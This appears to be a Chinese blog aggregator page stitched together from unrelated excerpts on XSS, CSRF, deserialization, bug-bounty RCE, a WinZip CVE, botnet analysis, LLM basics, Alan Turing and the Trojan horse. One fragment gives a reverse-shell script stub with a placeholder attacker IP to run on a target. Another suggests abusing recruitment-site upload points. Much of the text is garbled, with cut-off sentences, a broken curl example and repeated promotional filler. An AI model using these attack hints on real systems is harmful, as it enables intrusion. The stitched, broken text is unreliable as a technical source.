leah126的博客

例如：攻击者在合法网站的URL中写入了脚本，诱使用户使用该URL访问合法网站，此时服务器会返回夹带脚本信息和正常的数据一起返回给用户浏览器，用户此时如果操作了此返回数据，脚本就会在用户的主机中运行，把主机中的信息发送到攻击者所控制的服务器中，造成信息泄露。持久性，代码是存储在web服务器中的，比如在个人信息或发表文章等地方插入代码，如果没有过滤或者过滤不严，那么这些代码将存储在服务器中，用户访问该页面的时候触发代码执行。每一个访问特定页面的用户，都会受到攻击，甚至可以让用户机器变成 DDoS 攻击的肉鸡。

O了，看破就是要说破，我是V哥，一个永远18的程序员，喜欢广交天下志同道合的朋友，喜欢分享技术经验，讲真，这会促进我的荷尔蒙分泌，所以会一直坚持下去，欢迎关注威哥爱编程，技术路上我们一起成长。黑客/网络安全学习路线对于从来没有接触过黑客/网络安全的同学，目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1.招聘系统简历上传点，招聘系统有概率会有让你上传你的作品或者成果的上传点，比如应聘程序员会让你上传你开发的作品，可以试试传一些别的文件上去。2.通过漏洞发现供应商寻找通用的漏洞。3.资产足够，一定要写满10个案例！！！！！可以的话一定要利用漏洞展示出最大的危害。申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.黑客/网络安全学习路线。

Langchain-Chatchat是一个基于ChatGLM大语言模型与Langchain应用框架实现，开源、可离线部署的检索增强生成(RAG)大模型的本地知识库问答应用项目。

根据 ChatGPT 的使用经验，多数人都已知晓系统提示词的重要性。好的系统提示词能有效地将大模型定制成自己需要的状态。在 Ollama 中，有多种方法可以自定义系统提示词。首先，不少 Ollama 前端已提供系统提示词的配置入口，推荐直接利用其功能。此外，这些前端在底层往往是通过APIcurl -d '{"content": "以海盗的口吻简单作答。},"content": "天空为什么是蓝色的？],}'其中role为system的消息即为系统提示词。

反序列化漏洞：就是在反序列化过程中，如果恶意者可以对将要转换的字符串进行操控，从而达到任意代码执行的操作，就是反序列化漏洞。例如，攻击者可以构造恶意的Java序列化数据，其中包含可执行的Java代码，当应用程序使用反序列化操作将该数据还原成对象时，就会执行其中的恶意代码，造成安全威胁。反序列化漏洞的主要原理是应用程序在反序列化过程中没有对传入的数据进行足够的验证和过滤，导致攻击者可以利用构造的恶意序列化数据来执行任意代码或远程代码执行攻击。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

大家好，我是 Ansar Uddin，我是来自孟加拉国的网络安全研究员。这是我的第二篇 Bug 赏金文章。今天的话题都是关于 Rce 的利用。/*我在一家Top级的公司找到了一个案例:我检查了include=参数. 它容易受到 rce 的影响但是有一个 waf 阻止了我的请求我将payload转换为 url 编码再进行发包：成功Rce!另存为 test.gif 或 test.jpg===

之所以CTF被公认为网安界含金量最高的比赛之一，是因为现在很多企业和组织都认可CTF比赛的成绩，并且也是他们招聘人才的重要依据之一。参赛者的目标是找出系统中的安全漏洞，找到后会获得一个“flag”的特定字符串，然后提交就能获得分数。这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」CTF比赛到底是干嘛的？

大模型，通常指的是在人工智能领域中的大型预训练模型。你可以把它们想象成非常聪明的大脑，这些大脑通过阅读大量的文本、图片、声音等信息，学习到了世界的知识。这些大脑（模型）非常大，有的甚至有几千亿个参数，这些参数就像是大脑中的神经元，它们通过复杂的计算来理解和生成语言、图片等。举个例子，你可能听说过GPT-3，它就是一个非常著名的大模型。GPT-3可以通过理解你提出的问题，然后给出回答，或者根据你给它的提示，生成一篇文章、一个故事，甚至是一段代码。

我国企业从20世纪80年代开始就逐渐进行信息化建设，由于方法和体系的不成熟，以及企业业务和市场需求的不断变化，—个企业可能同时运行着多个不同的业务系统，这些系统可能基于不同的操作系统、不同的数据库、异构的网络环境。现在的问题是，如何把这些信息系统结合成一个有机地协同工作的整体，真正实现企业跨平台、分布式应用。中间件便是解决之道，它用自己的复杂换取了企业应用的简单，接下来我们来了解一下什么是中间件？

这使得 Flask 成为中小型项目或使用 Python 构建 Flask API 的绝佳选择，而 Django 则在更大、更复杂的应用程序中大放异彩，在这些应用程序中，一体化解决方案非常有用。Django是一个成熟的“功能齐全”的框架，拥有庞大的生态系统，提供用于附加功能（如身份验证、管理界面、内容管理系统等）的插件。社区驱动的示例：Streamlit 拥有一个强大的应用程序库，其中包含 Github 等平台上的示例和模板，展示了如何构建各种 Streamlit 应用程序和仪表板。

富文本编辑器（Rich Text Editor，RTE）是一种可内嵌于浏览器，所见即所得的文本编辑器。它提供类似于Office Word 的编辑功能，方便那些不太懂HTML用户使用，富文本编辑器的应用非常广泛。作为一个技术人员，选择使用合适的富文本编辑器还是很有用的，以备日后项目集成使用。下面是汇总的7款比较受欢迎的富文本编辑器，大家可以一起来看看！一、Editor.md。

OA系统是什么？不同行业应该怎么选OA系统？企业上OA系统应该注意什么？点进这篇推送的朋友应该心中都有这些疑惑。本文就为大家整理盘点了2025最新8大OA系统，从等四大方面进行对比，希望给还在选型的朋友们一些参考！OA，即Office Automation System，意思就是。它是一种专门为企业等组织的日常办公工作提供服务的综合性软件平台。

此外，Linux 系统在 OT 环境中的兴起也带来了新的挑战，因为这些系统可能缺乏成熟的安全解决方案，而且熟练的 Linux 网络安全专业人员较少，无法为其提供适当的保护。卡巴斯基工业控制系统网络紧急响应团队 (Kaspersky ICS CERT) 是卡巴斯基公司的一项全球倡议，旨在协调自动化系统供应商、工业设施所有者和运营商以及 IT 安全研究人员的工作，以保护工业企业免受网络攻击。在工业企业面临的六大新趋势中，创新技术被盗的风险越来越大，采用新技术和成熟技术带来的网络风险也在不断增加。

应用场景：适用于复杂的网络环境，如企业网络中有部分区域需要进行严格的子网划分和路由控制（采用路由模式），同时又有一些区域由于现有网络架构的限制或其他特殊需求，需要以透明模式接入防火墙进行安全防护。当一些复杂的、隐蔽的攻击手段可能绕过现有的安全防线时，旁路防火墙可以通过对流量的深度分析，发现潜在的入侵迹象。例如，在一个已经部署好的网络中，如果要添加防火墙进行安全防护，但又不想对现有网络设备（如服务器、客户端等）的 IP 地址和路由设置进行大规模修改，透明模式就非常合适。

可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。• 情报分级：战略情报(政策动向)→战术情报(IOC指纹)→技术情报(漏洞POC)• 实施要点：需区分基础设施扫描(每年4次)与业务系统扫描(重大变更后即时)• 攻击模拟：黑盒测试(模拟真实黑客) vs 白盒测试(开发视角排查)• 服务分级：普通事件(8小时响应) vs 重大事件(1小时极速响应)▶ 企业规模：小型企业(基础防护+等保)→中大型(安全运营+专项服务)▶ 行业属性：金融(数据安全)→制造(工控安全)→政务(关保密评)

进入渗透测试领域似乎是一件令人难以承受的事情——尤其是如果你之前没有任何经验的话。对我来说，渗透测试曾经看起来像是一个不可能实现的职业。但如果可以使用捷径来加速你的旅程呢？通过利用现有渗透测试人员的方法和个性中的弱点，你可以从一个完全的初学者变成在 2025 年获得第一份渗透测试员的工作。无论您是学生、转行者，还是对进攻性安全感兴趣的人，此路线图都旨在加快您的旅程。

IDS、IPS、上网行为管理、网闸、漏扫、日志审计、数据库审计、堡垒机对比如何写出一篇精彩的年终总结：网络工程师的全面指南2025 年，网络技术领域这五大热门事件值得关注！说到网络虚拟化技术，VRRP、堆叠、M-LAG一定要分得清！

根据目标系统的环境和权限，攻击者可以编写自定义的反弹shell脚本。import oshost ='x.x.x.x'# 攻击者IPport =1234# 监听端口将此脚本上传到目标系统并执行，即可建立反弹shell连接。

哈喽，师傅们这次又来给师傅们分享下最近的一个漏洞挖掘的一个过程，这次跟着一个师傅学习，然后自己动手去挖，也是学习到了不了东西。这次要给师傅们分享的案例是一个微信小程序的案例，这个小程序站点存在多个漏洞可以打，其中最主要是知识点就是开始的一个数据包构造，通过分析登录页面的数据包，进行队里面的数据包构造找到一个敏感信息接口，进而泄露了七千多个用户的sfz、xm、sjh等敏感信息。

近日，WinZip曝出一个编号为CVE-2025-1240的高危漏洞，远程攻击者可通过利用畸形的7Z压缩包文件，在受影响的系统上执行任意代码。该漏洞的CVSS评分为7.8，影响WinZip 28.0（版本号16022）及更早版本，用户需升级至WinZip 29.0以规避风险。该漏洞源于WinZip在解析7Z文件数据时验证不充分，导致攻击者可构造恶意压缩包，引发内存中的越界写入。这种内存损坏可被利用，在WinZip进程的上下文中执行代码，如果与其他漏洞结合使用，甚至可能导致整个系统被攻陷。

由于父亲的工作，Alan Turing 的童年在英国和印度之间辗转，而他的早期教育则是在英国完成的。Alan Turing 选择了接受化学阉割作为替代监禁的处罚，这不仅对他的身体造成了极大的伤害，也使他在社会上遭遇了巨大的耻辱。在谢尔本学校期间，他的数学天赋开始显现出来，尽管学校更注重经典文学教育，但 Alan Turing 对科学的热爱与专注使他在数学领域取得了显著的进步。英国银行发行的50英镑纸币上印有图灵的肖像，以纪念他的贡献。然而，可以肯定的是，他的工作缩短了战争的时间，拯救了数百万人的生命。

记得哦，管理员账户可是拥有最高权限的，能安装软件、修改设置啥的，所以给家里人设置的时候，要慎重考虑哦！再比如，爸爸爱炒股，妈妈爱追剧，你呢，当然是沉迷学习无法自拔啦（开个玩笑），这样大家互不干扰，电脑资源也能合理分配，多和谐呀！第一步，打开你的电脑，找到左下角的‘开始’菜单，轻轻一点，是不是感觉离成功又近了一步呢？别担心，跟着我的步骤走，保证你也能轻松变身电脑小管家，让家里的每个成员都有自己的小天地哦！这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」

在规模扩展定律（Scaling Laws）被证明对语言模型有效之后，研究者构建出了许多大语言模型。尤其是 2022 年底面向普通消费者的 ChatGPT 模型的出现，正式标志着自然语言处理进入大语言模型时代。本章将简要梳理大语言模型的技术要点以及构建过程，并且列举了可用于预训练以及微调模型的常用数据集，介绍了目前开发大语言模型常用的代码库、预训练大语言模型的步骤以及涉及的关键技术，包括数据准备阶段、模型架构以及实际的预训练操作。

例如:CSRF 就像你登录了银行账户，但同时点开了一个黑客发的钓鱼网页，这个网页偷偷让你的浏览器向银行发送伪造的转账请求，银行误以为是你本人操作，于是帮黑客把钱转走了。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。1.使用 CSRF Token：为每个请求生成唯一的、难以猜测的 CSRF Token，并在请求中携带和验证 Token，防止伪造请求。由于用户 C 已经登录过网站 A，浏览器会 自动附带 Cookie（身份凭证），导致网站 A 误以为这个请求是用户 C 本人发出的。

推荐关键交易API采用POST方式，可提高CSRF攻击成本，攻击者需在第三方页面（攻击站点）内构造POST请求，诱导用户首先进入预先准备好的攻击站点，并触发恶意请求，增加攻击链路长度。Referer字段记录了请求来源地址，可使用该字段校验请求是否来自安全站点，阻止非授权站点内触发的恶意请求，如果Referer为第三方非授权网址或空，一定程度上可判断该请求为恶意请求。③诱导用户点击站点B内某些资源，在用户不知情的情况下，在站点B内发送恶意请求(携带站点A的Cookie信息)至站点A。

XSS攻击，全称为跨站脚本攻击（Cross-Site Scripting），是一种常见的网络攻击手段。它主要利用了Web应用程序对用户输入验证的不足，允许攻击者将恶意脚本注入到其他用户浏览的网页中。XSS攻击是指攻击者在Web页面的输入数据中插入恶意脚本，当其他用户浏览该页面时，这些脚本就会在用户的浏览器上执行。由于脚本是在受害用户的上下文中执行的，因此它可以访问该用户的所有会话信息和权限，从而可能导致信息泄露、会话劫持、恶意操作等安全风险。

无需命令行基础，通过可视化界面轻松配置目标、加载字典，一键启动扫描，操作简单高效。覆盖主流服务如 SSH、FTP、MySQL、Redis、Telnet 等，满足企业多样化场景需求。基于多线程技术，显著提升密码尝试效率，支持自定义字典与规则。生成清晰报告，标记高风险账户，便于团队快速定位问题。

控制端的IP资源较为丰富，域名解析的IP将近60个，分布多个在不同的国家和服务商。AIRASHI僵尸网络样本更新频繁，拥有多个版本，部分版本除了支持主要的DDoS功能和操作系统命令执行外还支持代理服务，下文以kitty 和 AIRASHI为主要分析对象，从字串解密，C2获取，通信协议，以及支持的指令等方面入手，剖析僵尸网络的技术细节。值得注意的是，在12月3日AIRASHI-DDoS的C2解析A记录和TXT记录同时存在，且解密后存在对应关系，可能是为了兼容之前的版本，但这让加密编码都变得毫无意义。

尽管人们希望网络钓鱼、勒索软件、凭证填充这些攻击的频率能够变低，但在2025年，网络犯罪分子很可能会继续大力攻击，并根据积累的经验改进攻击手段。有效的缓解策略与传统商业环境中使用的策略类似，包括严格的访问控制、数据加密、持续监控以及全面的终端用户安全意识培训。各组织必须积极应对这些威胁，通过投资先进的安全技术、培养持续学习的文化以及跨部门合作，增强抵御日益复杂的网络对手的能力。预计到2028年，托管安全服务的支出将增长至421亿美元，黑客很可能会将目标转向这些服务提供商，以扩大其攻击的影响。

而到了2025年，随着AI、量子计算、元宇宙等技术的爆炸式发展，网络安全的战场将更加复杂——攻击者不再只是“黑客”，可能是AI机器人、国家级APT组织，甚至一段自我进化的恶意代码。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」部署“隐私增强技术”（PETs）：如联邦学习、同态加密，实现“数据可用不可见”。记住： 安全的本质是“风险与成本的平衡”，而真正的护城河，永远是人的意识。

2024年发生了多起引人注目的网络攻击，像戴尔和TicketMaster这样的大公司也都成为了数据泄露和其他基础设施攻击的受害者。到2025年，这样的趋势还将持续下去。正所谓知己知彼百战百胜，为了能应对任何类型的恶意软件攻击，每个组织都需要提前做好功课，了解可能遇见的网络敌人。本文整理了5种常见的恶意软件家族，现在就可以着手准备应对了。

对于互联网用户申请注册提供互联网新闻信息服务、网络出版服务等依法需要取得行政许可的互联网信息服务的账号，或者申请注册从事经济、教育、医疗卫生、司法等领域信息内容生产的账号，互联网信息服务提供者应当要求其提供服务资质、职业资格、专业背景等相关材料，予以核验并在账号信息中加注专门标识。互联网信息服务提供者发现互联网用户注册、使用账号信息违反法律、行政法规和本规定的，应当依法依约采取警示提醒、限期改正、限制账号功能、暂停使用、关闭账号、禁止重新注册等处置措施，保存有关记录，并及时向网信等有关主管部门报告。

AI大模型的原理基于深度学习和神经网络技术。其中，最著名的大模型之一是使用了变种的转换器（Transformer）架构的模型,比如GPT（Generative Pre-trained Transformer）。以下是AI大模型的基本原理：1数据收集和预处理：大模型的训练需要大量的数据。首先，大量的文本数据被收集和预处理，其中可能包括网页内容、书籍、新闻文章、维基百科等。数据可能会经过一定的清理和标准化处理。2模型架构：大模型通常基于深度神经网络架构，如变种的转换器模型。

博世实操中，以被分析对象的所有接口（包括通讯、诊断、配置、持久化）为切入点，结合类似HAZOP的引导词（如值域类的过大过小，时域类的过早过晚，通讯类的丢失等），生成单点失效模式，分析影响，作为后续安全机制导出的输入。如第2章所说，硬件导出的安全需求也是软件安全需求的一个重要来源，其中需要软件安全影响分析以及导出相关硬件故障监控的软件安全需求，这里以常见的硬件瞬态故障为例，简要介绍当硬件资源存在局限性而无法覆盖足够的诊断覆盖率时，如何通过软件安全分析导出软件安全需求。

学习大语言模型（Large Language Model, LLM）需要结合理论知识和实践操作。：掌握线性代数（矩阵运算）、概率统计（贝叶斯、分布）、微积分（梯度相关）。：理解监督学习、无监督学习、损失函数、优化算法（如梯度下降）。：学习神经网络（CNN/RNN）、反向传播、正则化技术（如Dropout）。：熟练使用Python及科学计算库（NumPy、Pandas）。：掌握PyTorch或TensorFlow，熟悉张量操作和模型训练流程。

如今大模型席卷AI界，已经成为所有人工智能的从业者都要入局的领域。今天给大家梳理。都是行业前沿与顶会大热，容易出idea，想或者都可以看一下。144篇158篇23篇176篇31篇14篇下面给大家分享一份2025最新版的大模型学习路线，帮助新人小白更系统、更快速的学习大模型！因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取**

随着人工智能技术的飞速发展，大模型（Large Models）已成为推动行业革新的关键力量。这些模型在自然语言处理、计算机视觉、推荐系统等领域展现出卓越的性能，为求职者开辟了新的职业道路。本文将深入探讨AI大模型时代下的热门就业方向。一、自然语言处理（NLP）自然语言处理是大模型应用最为广泛的领域之一。随着BERT、GPT等预训练模型的普及，NLP工程师的需求量激增。

包含该用户代理的请求中， 93% 是 DDoS 攻击的一部分。2024 年第四季度，超大规模的第 3 层/第 4 层 DDoS 攻击激增，其中最大的一次攻击打破了之前的记录，峰值达到 5.6 Tbps。DDoS 攻击的目标通常是网站的根目录（“/”），但在其他情况下，它们也可以针对特定的路径。/wp-admin/在所有 HTTP DDoS 请求中，接近 5% 的请求来自 Hetzer 的网络，也就是说， Cloudflare 阻止的每 100 个 HTTP DDoS请求中，有 5 个来自 Hetzer。

***作为进攻者的迈锡尼希腊人，已经由分散的城邦发展为地区联盟，并以一个整体出现在外部世界面前。**公元前10-8世纪间的黑暗时代，大批像荷马这样的游吟诗人，承担起希腊这片土地上的族群记忆和共同体构建。**特洛伊城本身也有自己的养马产业，并经常向外部贩售马匹，进一步完善了后来的特洛伊木马形象。**立国安纳托利亚中部山区的赫悌，就很自然的将其置于自己的控制之下。**长期以来，关于特洛伊战争与木马的传说故事，都被认为是捕风捉影的艺术虚构。****守城的迈锡尼裔士兵，最后一次见识到“特洛伊木马”的威力。